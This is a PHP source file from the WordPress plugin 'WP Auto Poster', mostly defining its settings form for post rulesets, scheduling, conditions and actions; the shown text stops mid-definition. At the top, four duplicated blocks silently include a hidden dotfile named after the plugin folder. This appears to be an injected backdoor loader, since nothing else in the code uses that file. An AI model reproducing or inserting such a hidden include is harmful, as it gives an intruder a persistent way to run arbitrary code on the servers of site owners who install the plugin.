<?php

include_once( 'WpAutoPoster_LifeCycle.php' );

if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );
}

if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );
}

if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );
}

if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );
}

class WpAutoPoster_Plugin extends WpAutoPoster_LifeCycle {
	
	protected $logs = null;
	
	/**
	 * Define any tabs to use, if any. Will match formElements using 'tab' field to that tab, but they must be in order.
	 * @return array of tab name data.
	 */
	protected function getTabs( $which = 'main' ) {
		// Use tabs to split up options page. Use formElement 'tab' to match each location.
		if ( $which === 'main' )
			return array(
				'Rulesets',
				'Logs',
				
				'Advanced' 
			);
		else if ( $which === 'ruleset' )
			return array(
				'General',
				'Post Conditions',
				'Post Actions',
				'Post Recycling' 
			);
		// Don't use tabs:
		return array();
	}
	
	/**
	 * Modify this function for your plugin settings
	 * @return array of option meta data.
	 */
	public function getOptionMetaData() {

		// get some data right away that may be used in several places
		$post_types = get_transient( $this->getPluginTextDomain() . '-post-types' );
		if ( !$post_types ) {
			$post_types = array_diff( get_post_types( array(
				'public' => true 
			), 'names' ), array(
				'attachment' 
			) );
			$post_types = apply_filters( $this->getPluginTextDomain() . '-form-post-types', $post_types );
			set_transient( $this->getPluginTextDomain() . '-post-types', $post_types, MINUTE_IN_SECONDS );
		}

		$post_statuses = get_transient( $this->getPluginTextDomain() . '-post-statuses' );
		if ( !$post_statuses ) {
			$post_statuses = array_diff( get_post_stati(), array(
				'auto-draft',
				'inherit',
				'request-pending',
				'request-confirmed',
				'request-failed',
				'request-completed',
				'private' 
			) );
			$post_statuses = apply_filters( $this->getPluginTextDomain() . '-form-post-statuses', $post_statuses );
			set_transient( $this->getPluginTextDomain() . '-post-statuses', $post_statuses, MINUTE_IN_SECONDS );
		}

		$maxEntries = $this->getOption( 'SelectMaxEntries', 1000 );
		
		$authors = get_transient( $this->getPluginTextDomain() . '-post-authors' );
		if ( !$authors ) {
			$args       = apply_filters( $this->getPluginTextDomain() . '-form-post-authors', array(
				'capability' => array( 'edit_posts' ),
				'fields' => array(
					'ID',
					'display_name' 
				),
				'number' => $maxEntries 
			) );

			// Capability queries were only introduced in WP 5.9.
			if ( version_compare( $GLOBALS['wp_version'], '5.9-alpha', '<' ) ) {
    				$args['who'] = 'authors';
    				unset( $args['capability'] );
			}

			$user_query = new WP_User_Query( $args );
			$authors    = $user_query->get_results();
			$authors = apply_filters( $this->getPluginTextDomain() . '-form-post-authors2', $authors );
			set_transient( $this->getPluginTextDomain() . '-post-authors', $authors, MINUTE_IN_SECONDS );
		}

		// Set options into array
		
		$metaData = array(
			'ID' => array(
				'description' => esc_html__( 'ID:'  ),
				'formElement' => array(
					'type' => 'hidden',
					'value' => '',
					'tab' => 'Rulesets',
					'useIndex' => 'Rulesets',
					'indexRequired' => true 
				) 
			),
			// GENERAL
			'Status' => array(
				'description' => esc_html__( 'Status:'  ),
				'formElement' => array(
					'type' => 'text',
					'value' => '',
					'default' => 'enabled',
					'tab' => 'General',
					'useIndex' => 'Rulesets',
					'params' => 'readonly class="wp-auto-poster-input-transparent"' 
				) 
			),
			'Name' => array(
				'description' => esc_html__( 'Name:'  ),
				'formElement' => array(
					'type' => 'text',
					'value' => '',
					'tab' => 'General',
					'useIndex' => 'Rulesets',
					'subtext' => 'An identifier for this ruleset, if desired.',
					'tooltip' => '<h3>' . esc_html__( 'Name'  ) . '</h3><ul><li>' . esc_html__( 'A moniker to summarize this ruleset.'  ) . '</li></ul>' 
				) 
			),
			'Frequency' => array(
				'description' => esc_html__( 'Event Frequency:'  ),
				'formElement' => array(
					'type' => 'text',
					'value' => '',
					'placeholder' => 'required',
					'tab' => 'General',
					'useIndex' => 'Rulesets',
					'subtext' => esc_html__( 'How often to check this Ruleset, in format DdHhMmSs, such as 1d, 14h, 30m, 20s or even 1d8h10m30s.'  ),
					'indexRequired' => true,
					'tooltip' => '<h3>' . esc_html__( 'Event Frequency'  ) . '</h3><ul><li>' . esc_html__( 'This setting is used to schedule an event in WordPress. When this ruleset event is triggered by a cron check, WP Auto Poster will check the ruleset settings to see if any posts need to be acted upon.'  ) . '</li><li>' . esc_html__( 'By default, WordPress typically checks for scheduled events whenever a page is loaded.'  ) . '</li><li>' . esc_html__( 'Standard format is DdHhMmSs, such as 1d, 14h, 30m, 20s or even 1d8h10m30s'  ) . '</li><li>' . esc_html__( 'Time range format is DdHhMmSs-DdHhMmSs, such as 10h-20h, which will randomly choose the next event time between 10 and 20 hours.'  ) . '</li><li>' . esc_html__( 'Delay format is DdHhMmSs+DdHhMmSs, such as 5h+10h, which will delay the first event by 5 hours then schedule further events every 10 hours.'  ) . '</li><li>' . esc_html__( 'Altogether example: 5h30m+10h-20h will delay the first event by 5 hours 30 minutes, then each further event will be randomly set between 10 and 20 hours from the previous event.'  ) . '</li><li>' . esc_html__( 'You may also specify multiple possible Event Frequencies, such as "10m,30m,4h" and one will be chosen at random each time for the next event.'  ) . '</li></ul>' 
				) 
			),
			'RestartOnPublish' => array(
				'description' => esc_html__( 'Restart Frequency on Publish?'  ),
				'formElement' => array(
					'type' => 'select',
					'subtext' => esc_html__( 'Next frequency check will be reset when a selected post type is published manually or by any other source.'  ),
					'value' => $post_types,
					'default' => '',
					'tab' => 'General',
					'useIndex' => 'Rulesets',
					'params' => 'multiple size="3" class="wapSelect"',
					'tooltip' => '<h3>' . esc_html__( 'Restart Frequency on Publish'  ) . '</h3><ul><li>' . esc_html__( 'Example: The Event Frequency is every 24 hours, but 20 hours since the last ruleset event triggered you decide to publish a post manually. The next ruleset event is scheduled to trigger in 4 hours.'  ) . '</li><li>' . esc_html__( 'If this setting is NOT checked, the next ruleset event will still occur in 4 hours, as scheduled.'  ) . '</li><li>' . esc_html__( 'If this setting IS checked, the next ruleset event will restart and be set to 24 hours from when you manually published the post.'  ) . '</li></ul>' 
				) 
			),
			'Inclusions' => array(
				'description' => esc_html__( 'Inclusion Dates:'  ),
				'formElement' => array(
					'type' => 'text',
					'value' => '',
					'tab' => 'General',
					'useIndex' => 'Rulesets',
					'subtext' => esc_html__( 'Only parse this ruleset on these specific dates and/or times. Separate multiple entries with commas.'  ),
					'tooltip' => '<h3>' . esc_html__( 'Inclusion Dates'  ) . '</h3>' . esc_html__( 'Recognizes the following date and time formats:'  ) . '<ul><li>' . esc_html__( 'YYYY-MM-DD Example: 2020-12-25 is the 25th of December, 2020.'  ) . '</li><li>' . esc_html__( 'YYYY-MM Example: 2020-12 is the entire month of December, 2020.'  ) . '</li><li>' . esc_html__( 'MM-DD Example: 12-25 is the 25th of December of every year.'  ) . '</li><li>' . esc_html__( 'YYYY Example: 2020 is the entire year of 2020.'  ) . '</li><li>' . esc_html__( 'DD Example: 25 is the 25th of every month.'  ) . '</li><li>' . esc_html__( 'M (Three letter month) Example: Dec is the entire month of December. You can use slash for more than one month, such as Jan/Feb/Mar.'  ) . '</li><li>' . esc_html__( 'D (Three letter day) Example: Mon is every Monday. You can use slash for more than one day, such as Mon/Wed/Fri.'  ) . '</li><li>' . esc_html__( 'hhhh-hhhh is a 24 hour time range. Example: 0900-1700 is between the hours of 9am and 5pm. You may attach the time range after any date format. Examples:'  ) . '<ul><li>' . esc_html__( 'Nov/Dec:0900-1700 is between the hours of 9am and 5pm only in November and December.'  ) . '</li><li>' . esc_html__( 'Mon/Wed/Fri:0900-1700 is between the hours of 9am and 5pm only on Mondays, Wednesdays and Fridays.'  ) . '</li><li>' . esc_html__( '12-25:0900-1700 is between the hours of 9am and 5pm only on Dec 25th.'  ) . '</li></ul></li><li>' . esc_html__( 'Relative formats for YYYY-MM-DD dates. Examples: \'last day of this month\' and \'second saturday of July\''  ) . '</ul>',
					'fullWidth' => true 
				) 
			),
			'Exclusions' => array(
				'description' => esc_html__( 'Exclusion Dates:'  ),
				'formElement' => array(
					'type' => 'text',
					'value' => '',
					'tab' => 'General',
					'useIndex' => 'Rulesets',
					'subtext' => esc_html__( 'Any specific dates and/or times to NOT parse this ruleset. Separate multiple entries with commas.'  ),
					'tooltip' => '<h3>' . esc_html__( 'Exclusion Dates'  ) . '</h3>' . esc_html__( 'Recognizes the following date and time formats:'  ) . '<ul><li>' . esc_html__( 'YYYY-MM-DD Example: 2020-12-25 is the 25th of December, 2020.'  ) . '</li><li>' . esc_html__( 'YYYY-MM Example: 2020-12 is the entire month of December, 2020.'  ) . '</li><li>' . esc_html__( 'MM-DD Example: 12-25 is the 25th of December of every year.'  ) . '</li><li>' . esc_html__( 'YYYY Example: 2020 is the entire year of 2020.'  ) . '</li><li>' . esc_html__( 'DD Example: 25 is the 25th of every month.'  ) . '</li><li>' . esc_html__( 'M (Three letter month) Example: Dec is the entire month of December. You can use slash for more than one month, such as Jan/Feb/Mar.'  ) . '</li><li>' . esc_html__( 'D (Three letter day) Example: Mon is every Monday. You can use slash for more than one day, such as Mon/Wed/Fri.'  ) . '</li><li>' . esc_html__( 'hhhh-hhhh is a 24 hour time range. Example: 0900-1700 is between the hours of 9am and 5pm. You may attach the time range after any date format. Examples:'  ) . '<ul><li>' . esc_html__( 'Nov/Dec:0900-1700 is between the hours of 9am and 5pm only in November and December.'  ) . '</li><li>' . esc_html__( 'Mon/Wed/Fri:0900-1700 is between the hours of 9am and 5pm only on Mondays, Wednesdays and Fridays.'  ) . '</li><li>' . esc_html__( '12-25:0900-1700 is between the hours of 9am and 5pm only on Dec 25th.'  ) . '</li></ul></li><li>' . esc_html__( 'Relative formats for YYYY-MM-DD dates. Examples: \'last day of this month\' and \'second saturday of July\''  ) . '</ul>',
					'fullWidth' => true 
				) 
			),
			'MaxDailyPosts' => array(
				'description' => esc_html__( 'Max Posts per Day:'  ),
				'formElement' => array(
					'type' => 'number',
					'value' => '0',
					'params' => 'max=10000 min=0 step=1',
					'tab' => 'General',
					'useIndex' => 'Rulesets',
					'subtext' => esc_html__( 'Max number of posts WAP will act upon each day from this ruleset. 0 for no limit.'  ),
					'tooltip' => '<h3>' . esc_html__( 'Max Posts per Day'  ) . '</h3><ul><li>' . esc_html__( 'Max number of posts WAP will cat upon each day from this ruleset. You can enter 0 for no limit.'  ) . '</li></ul>' 
				) 
			) 
		);
		
		// POST CONDITIONS
		$metaData[ 'MaxNumberPosts' ] = array(
			'description' => esc_html__( 'Max Posts per Query:'  ),
			'formElement' => array(
				'type' => 'number',
				'value' => '1',
				'params' => 'max=10000 min=1 step=1',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'subtext' => esc_html__( 'Max number of posts to query during each ruleset check.'  ),
				'indexRequired' => true,
				'tooltip' => '<h3>' . esc_html__( 'Max Posts per Query'  ) . '</h3><ul><li>' . esc_html__( 'Max number of posts to query for during each ruleset check. Be aware that, depending on your server, a large query amount may run out of memory or reach any time constraints set by your server configuration.'  ) . '</li></ul>' 
			) 
		);
		
		$metaData[ 'IgnoreStickies' ] = array(
			'description' => esc_html__( 'Ignore Sticky Posts?'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'subtext' => esc_html__( 'Queries will ignore sticky posts.'  ),
				'value' => '',
				'default' => 'on',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'tooltip' => '<h3>' . esc_html__( 'Ignore Sticky Posts'  ) . '</h3><ul><li>' . sprintf( '<a target="_blank" href="%s">', esc_url( 'https://codex.wordpress.org/Sticky_Posts' ) ) . esc_html__( 'Sticky posts'  ) . '</a>' . esc_html__( ' are a WordPress feature for standard posts, and are automatically placed at the top of the front page of posts.'  ) . '</li></ul>' 
			) 
		);
		
		$metaData[ 'SuppressFilters' ] = array(
			'description' => esc_html__( 'Suppress Filters?'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'subtext' => esc_html__( 'Queries will suppress filters to prevent other plugins from modifying the results.'  ),
				'value' => '',
				'default' => '',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'tooltip' => '<h3>' . esc_html__( 'Suppress Filters'  ) . '</h3><ul><li>' . esc_html__( 'Queries will suppress filters to prevent other plugins from modifying the results, such as WPML which would modify the query to only return posts that match the current language. Usually this is not required.'  ) . '</li></ul>' 
			) 
		);
		
		$metaData[ 'LimitPostTypes' ] = array(
			'description' => esc_html__( 'Limit check to Post Types:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Queries will be limited to selected post types.'  ),
				'value' => $post_types,
				'default' => '',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'params' => 'multiple size="5" class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Limit check to...'  ) . '</h3><ul><li>' . esc_html__( 'These will limit the eligible post query to the post types selected. If nothing is selected, the WordPress default \'post\' will be used.'  ) . '</li></ul>' 
			) 
		);
		
		$metaData[ 'LimitPostStatuses' ] = array(
			'description' => esc_html__( 'Limit check to Post Statuses:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Queries will be limited to selected post statuses.'  ),
				'value' => $post_statuses,
				'default' => '',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'params' => 'multiple size="5" class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Limit check to...'  ) . '</h3><ul><li>' . esc_html__( 'These will limit the eligible post query to the post statuses selected. If nothing is selected, no eligible posts will be found. Select nothing if you want to skip to Post Recycling.'  ) . '</li></ul>' 
			) 
		);
		
		$metaData[ 'LimitPostAuthors' ] = array(
			'description' => esc_html__( 'Limit check to Authors:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Queries will be limited to selected authors.'  ),
				'value' => $authors,
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'params' => 'multiple size="5" class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Limit check to...'  ) . '</h3><ul><li>' . esc_html__( 'These will limit the eligible post query to the authors selected.'  ) . '</li></ul>' 
			) 
		);
		
		$support       = true;
		$useTaxonomies = $support ? $this->getOption( 'UseTaxonomies', array ()) : array(
			'category',
			'post_tag' 
		);
		
		foreach ( $useTaxonomies as $useTaxonomy ) {
			if ( false === taxonomy_exists( $useTaxonomy ) )
				continue;
			$taxonomy_entries = get_transient( $this->getPluginTextDomain() . '-' . $useTaxonomy );
			
			if ( !$taxonomy_entries ) {
				
				if ( wp_count_terms( $useTaxonomy, array(
					'hide_empty' => 0 
				) ) > $maxEntries )
					$args = array(
						'taxonomy' => $useTaxonomy,
						'hide_empty' => 0,
						'hierarchical' => false,
						'number' => $maxEntries 
					);
				else
					$args = array(
						'taxonomy' => $useTaxonomy,
						'hide_empty' => 0 
					);
				
				$args = apply_filters( $this->getPluginTextDomain() . '-form-taxonomy', $args );
				
				// defaults to orderby name ASC (requires WP 4.5+)
				$taxonomy_entries = get_terms( $args );
				if ( is_wp_error( $taxonomy_entries ) ) {
					$msg = sprintf( esc_html__( 'WP error in WAP %s - %s - get_terms args were: %s'  ), __FUNCTION__, $taxonomy_entries->get_error_message(), print_r( $args, true ) );
					echo "<div class='error'><p>" . $msg . "</p></div>";
				} else {
					// set up hierarchy of terms
					$taxonomy_hierarch = array();
					$this->sortTermsHierarchicaly( $taxonomy_entries, $taxonomy_hierarch );
					$taxonomy_entries = array();
					// convert term objects to id->name array
					$this->convertTerms( $taxonomy_hierarch, $taxonomy_entries );
					set_transient( $this->getPluginTextDomain() . '-' . $useTaxonomy, $taxonomy_entries, MINUTE_IN_SECONDS );
				}
			}
			
			$metaData[ $useTaxonomy ] = array(
				'description' => sprintf( esc_html__( 'Limit check to %s:'  ), $useTaxonomy ),
				'formElement' => array(
					'type' => 'select',
					'subtext' => sprintf( esc_html__( 'Queries will be limited to selected %s entries.'  ), $useTaxonomy ),
					'value' => $taxonomy_entries,
					'default' => '',
					'tab' => 'Post Conditions',
					'useIndex' => 'Rulesets',
					'params' => 'multiple size="5" class="wapSelect"',
					'tooltip' => '<h3>' . esc_html__( 'Limit check to...'  ) . '</h3><ul><li>' . esc_html__( 'These will limit the eligible post query to the taxonomy terms selected. Set the taxonomies to display in the Advanced tab.'  ) . '</li></ul>' 
				) 
			);
			if ( !in_array( $useTaxonomy, array(
				'category',
				'post_tag' 
			) ) )
				$metaData[ $useTaxonomy ][ 'formElement' ][ 'tooltip' ] .= '<ul><li>' . esc_html__( 'Note that if custom taxonomies are selected, WordPress will not limit the Post Types.'  ) . '</li></ul>';
		}
		
		$metaData[ 'LimitPostSearch' ] = array(
			'description' => esc_html__( 'Limit check to Keyword Search:'  ),
			'formElement' => array(
				'type' => 'text',
				'value' => '',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'subtext' => esc_html__( 'Queries will be limited using these search terms.'  ),
				'tooltip' => '<h3>' . esc_html__( 'Limit check to Keyword Search'  ) . '</h3><ul><li>' . esc_html__( 'This invokes the '  ) . sprintf( '<a target="_blank" href="%s">', esc_url( 'https://developer.wordpress.org/reference/classes/wp_query/#search-parameters' ) ) . esc_html__( 'WordPress search parameter'  ) . '</a>. ' . esc_html__( 'A couple of notes about their search:'  ) . '<br><br><ul><li>' . esc_html__( 'WordPress searches the post title, post content, post excerpt, and custom fields.'  ) . '</li><li>' . esc_html__( 'Prepending a term with a hyphen will exclude posts matching that term.'  ) . '</li><li>' . esc_html__( 'Multiple words are searched using the AND parameter.'  ) . '</li><li>' . esc_html__( 'WordPress searches as strings, so numbered custom fields will not match.'  ) . '</li><li>' . esc_html__( 'There is a WordPress '  ) . sprintf( '<a target="_blank" href="%s">%s</a> ', esc_url( 'https://core.trac.wordpress.org/ticket/43634' ), esc_html__( 'programming bug'  ) ) . esc_html__( 'if using all negative search terms and the number of negative search terms is greater than 9.'  ) . '</ul></li></ul>',
				'fullWidth' => true 
			) 
		);

		$metaData[ 'CustomSearch' ] = array(
			'description' => esc_html__( 'Limit Keyword Search to:'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'value' => array(
					'title'		=> esc_html__( 'Post Title'  ),
					'content'	=> esc_html__( 'Post Content'  ),
					'excerpt'	=> esc_html__( 'Post Excerpt'  ),
					'fields'	=> esc_html__( 'Custom Fields'  ),
				),
				'default' => '',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'tooltip' => '<h3>' . esc_html__( 'Limit Keyword Search to'  ) . '</h3><ul><li>' . esc_html__( 'This will modify the WordPress search to target only the specified content fields.'  ) . '</li><li>' . esc_html__( 'Note that WordPress searches as strings, so numbered custom fields will not match.'  ) . '</li></ul>',
				'params' => 'multiple',
				'fullSpace' => true 
			) 
		);

		$metaData[ 'LimitPostIDs' ] = array(
			'description' => esc_html__( 'Limit check by Post IDs:'  ),
			'formElement' => array(
				'type' => 'text',
				'value' => '',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'subtext' => esc_html__( 'Queries will be limited using these post IDs.'  ),
				'tooltip' => '<h3>' . esc_html__( 'Limit check by Post IDs'  ) . '</h3><ul><li>' . esc_html__( 'You can limit the query to specific post IDs if needed. You may instead use negative post ID numbers to exclude them from the query. Do not use both as they are mutually exclusive.'  ) . '</li><li>' . esc_html__( 'Example 1: 4,12,17 will limit query to post IDs 4, 12 and 17.'  ) . '</li><li>' . esc_html__( 'Example 2: -4,-12,-17 will limit query to exclude post IDs 4, 12 and 17.'  ) . '</li></ul>',
				'fullWidth' => true 
			) 
		);


		$metaData[ 'LimitFeaturedImages' ]    = array(
			'description' => esc_html__( 'Limit by Featured Images:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Queries will be limited based on post thumbnails, aka featured images.'  ),
				'value' => array(
					'No'	=> esc_html__( 'No'  ),
					'Has'	=> esc_html__( 'Has featured image'  ),
					'Missing'	=> esc_html__( 'Missing featured image'  ),
				),
				'default' => 'No',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Limit check to Featured Images'  ) . '</h3><ul><li>' . esc_html__( 'No - No limiting by thumbnails.'  ) . '</li><li>' . esc_html__( 'Has featured image - Limit check to posts that have featured images.'  ) . '</li><li>' . esc_html__( 'Missing featured image - Limit check to posts without featured images.'  ) . '</li></ul>' 
			) 
		);

		$metaData[ 'MinPostAge' ]      = array(
			'description' => esc_html__( 'Minimum Post Age:'  ),
			'formElement' => array(
				'type' => 'text',
				'value' => '0',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'subtext' => esc_html__( 'Posts must be older than this number of days to be eligible. Enter 0 to ignore.'  ),
				'tooltip' => '<h3>' . esc_html__( 'Minimum Post Age'  ) . '</h3><ul><li>' . esc_html__( 'Posts must be older than this number of days to be eligible. Enter 0 or leave blank to ignore. Also accepts any '  ) . sprintf( '<a target="_blank" href="%s">%s</a> ', esc_url( 'https://www.php.net/manual/en/function.strtotime.php'), 'strtotime' ) . esc_html__( 'date format'  ) . '</li></ul>' 
			) 
		);
		$metaData[ 'MaxPostAge' ]      = array(
			'description' => esc_html__( 'Maximum Post Age:'  ),
			'formElement' => array(
				'type' => 'text',
				'value' => '0',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'subtext' => esc_html__( 'Posts must be newer than this number of days to be eligible. Enter 0 or leave blank to ignore.'  ),
				'tooltip' => '<h3>' . esc_html__( 'Maximum Post Age'  ) . '</h3><ul><li>' . esc_html__( 'Posts must be newer than this number of days to be eligible. Enter 0 or leave blank to ignore. Also accepts any '  ) . sprintf( '<a target="_blank" href="%s">%s</a> ', esc_url( 'https://www.php.net/manual/en/function.strtotime.php'), 'strtotime' ) . esc_html__( 'date format'  ) . '</li></ul>' 

			) 
		);
		$qOrder                        = array(
			'CommentCount' => esc_html__( 'Comment Count'  ),
			'Newest' => esc_html__( 'Newest Posts'  ),
			'Oldest' => esc_html__( 'Oldest Posts'  ),
			'Random' => esc_html__( 'Random Posts'  ),
			'SearchRelevance' => esc_html__( 'Search Relevance'  ) 
		);
		$metaData[ 'QueryOrderBy' ]    = array(
			'description' => esc_html__( 'Order of Query Results:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'How eligible posts returned by the query will be ordered.'  ),
				'value' => $qOrder,
				'default' => 'Oldest',
				'tab' => 'Post Conditions',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Order of Query Results'  ) . '</h3><ul><li>' . esc_html__( 'Comment Count - Post results will be ordered from most commented on to lowest.'  ) . '</li><li>' . esc_html__( 'Newest Posts - Post results will be ordered from newest to oldest.'  ) . '</li><li>' . esc_html__( 'Oldest Posts - Post results will be ordered from oldest to newest.'  ) . '</li><li>' . esc_html__( 'Random Posts - Post results will be randomly ordered.'  ) . '</li><li>' . esc_html__( 'Search Relevance - Post results will be ordered by relevance to the Keyword Search.'  ) . '</li></ul>' 
			) 
		);
		/* --- POST ACTIONS --- */

		$metaData[ 'ClonePost' ] = array(
			'description' => esc_html__( 'Clone Post:'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'subtext' => esc_html__( 'Will clone the eligible posts then apply Post Actions to the clones.'  ),
				'value' => '',
				'default' => '',
				'tab' => 'Post Actions',
				'useIndex' => 'Rulesets',
				'tooltip' => '<h3>' . esc_html__( 'Clone Post'  ) . '</h3><ul><li>' . esc_html__( 'Will clone the eligible posts then apply Post Actions to the clones. This is useful to create new posts from draft/pending post template(s). Cloned posts default to draft status so be sure to set a new post status if desired.'  ) . '</li></ul>',
			) 
		);
		
		$metaData[ 'SetPostSticky' ] = array(
			'description' => esc_html__( 'Set Post Sticky to:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Set the post sticky of eligible posts. This only works on standard WordPress \'post\' types.'  ),
				'value' => array(
					 0 => 'inherit',
					'Stick' => 'Stick',
					'Unstick' => 'Unstick' 
				),
				'default' => '',
				'tab' => 'Post Actions',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Set Post Sticky to...'  ) . '</h3><ul><li>' . esc_html__( 'Set post sticky of eligible posts when triggered. Inherit means no change.'  ) . '</li></ul>' 
			) 
		);
		array_unshift( $post_types, 'inherit' );
		$metaData[ 'SetPostType' ] = array(
			'description' => esc_html__( 'Set Post Type to:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Set the post type of eligible posts.'  ),
				'value' => $post_types,
				'default' => '',
				'tab' => 'Post Actions',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Set Post Type to...'  ) . '</h3><ul><li>' . esc_html__( 'Set post type of eligible posts when triggered. Inherit means no change.'  ) . '</li></ul>' 
			) 
		);
		
		// add and push these values to the top
		$post_statuses = array( 'inherit' => 'inherit', 'trash' => 'trash' ) + $post_statuses;
		$metaData[ 'SetPostStatus' ] = array(
			'description' => esc_html__( 'Set Post Status to:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Set the post status of eligible posts.'  ),
				'value' => $post_statuses,
				'default' => '',
				'tab' => 'Post Actions',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Set Post Status to...'  ) . '</h3><ul><li>' . esc_html__( 'Set post status of eligible posts when triggered. Inherit means no change.'  ) . '</li><li>' . esc_html__( 'If setting a draft or pending post to \'publish\', WordPress will also update the date of the post unless you choose to keep the original date.'  ) . '</li><li>' . esc_html__( 'If you are publishing a previously published post, WordPress will not update the post date. Use Post Recycling instead.'  ) . '</li></ul>' 
			) 
		);

		$metaData[ 'SetPostDate' ] = array(
			'description' => esc_html__( 'Set Post Date to:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Set the post date of eligible posts.'  ),
				'value' => array(
					 0 => 'inherit',
					'Keep Time' => 'Keep Time',
					'Current Time' => 'Current Time',
				),
				'default' => '',
				'tab' => 'Post Actions',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Set Post Date to...'  ) . '</h3><ul><li>' . esc_html__( 'Set post date of eligible posts when triggered. Inherit means using the default WordPress action, if any. Typically, this would update the post date when a NEW draft or pending post is published and the post_date_gmt has not already been set.'  ) . '</li><li>' . esc_html__( 'Keep Time will ensure WordPress does not change the post date.'  ) . '</li><li>' . esc_html__( 'Current Time will ensure WordPress changes the post date to the current time when triggered.'  ) . '</li></ul>' 
			) 
		);
		
		
		array_unshift( $authors, 'inherit' );
		$metaData[ 'SetPostAuthor' ] = array(
			'description' => esc_html__( 'Set Author to:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Set the author of eligible posts.'  ),
				'value' => $authors,
				'tab' => 'Post Actions',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Set Author to...'  ) . '</h3><ul><li>' . esc_html__( 'Set author of eligible posts when triggered. Inherit means no change.'  ) . '</li></ul>' 
			) 
		);

		$metaData[ 'FindReplace' ] = array(
			'description' => esc_html__( 'Find and Replace:'  ),
			'formElement' => array(
				'type' => 'textarea',
				'value' => '',
				'tab' => 'Post Actions',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'placeholder' => htmlentities( 'find => replace' ),
				'tooltip' => '<h3>' . esc_html__( 'Find and Replace'  ) . '</h3><ul><li>' . esc_html__( 'Will search and replace in post title, content, and excerpt unless limited.'  ) . '</li><li>' . esc_html__( 'One rule per line in X => Y format. Case is preserved. Supports spintax for replacement.'  ) . '</li><li>' . esc_html__( 'Spintax is resolved once and replaces every find.'  ) . '</li><li>' . esc_html__( 'Note if the title changes so does the post slug, so the post permalink may change.'  ) . '</li><li>' . esc_html__( 'Example 1, replace every word cat with dog: "cat => dog"'  ) . '</li><li>' . esc_html__( 'Example 2, remove every word cat: "cat =>"'  ) . '</li><li>' . esc_html__( 'Example 3, replace every word cat with random spintax: "cat => {dog|elephant|weasel}"'  ) . '</li></ul>Special Keywords:<ul><li>' . esc_html__( 'Remove every sentence containing the word cat: "cat => REMOVE_SENTENCE"'  ) . '</li><li>' . esc_html__( 'Replace every %%date%% with the current date: "%%date%% => DATE_FORMAT"'  ) . '</li><li>' . esc_html__( 'Replace every %%time%% with the current time: "%%time%% => TIME_FORMAT"'  ) . '</li></ul>',
				'fullWidth' => true 
			) 
		);

		$metaData[ 'CustomFindReplace' ] = array(
			'description' => esc_html__( 'Limit Find and Replace to:'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'value' => array(
					'title'		=> esc_html__( 'Post Title'  ),
					'content'	=> esc_html__( 'Post Content'  ),
					'excerpt'	=> esc_html__( 'Post Excerpt'  ),
				),
				'default' => '',
				'tab' => 'Post Actions',
				'useIndex' => 'Rulesets',
